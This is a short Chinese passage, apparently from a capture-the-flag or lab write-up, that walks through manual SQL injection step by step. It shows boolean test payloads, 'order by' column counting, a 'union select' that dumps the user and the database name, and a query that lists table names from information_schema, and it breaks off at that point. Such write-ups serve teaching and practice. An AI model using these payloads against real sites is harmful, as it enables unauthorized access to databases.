手动解题步骤1. 检查是否存在注入and1=1#返回正确and1=2#返回错误 存在2. 猜字段数 得出字段数1orderby11orderby21orderby3 可以看出存在俩个字段3. 爆数据库名-1unionselectuser(),database()##-1是为了前面部分查询无结果,从而显示后面union的查询结果 得到数据库名称sqli4. 爆表名-1unionselect999,group_concat(table_name)frominformation_schema.tables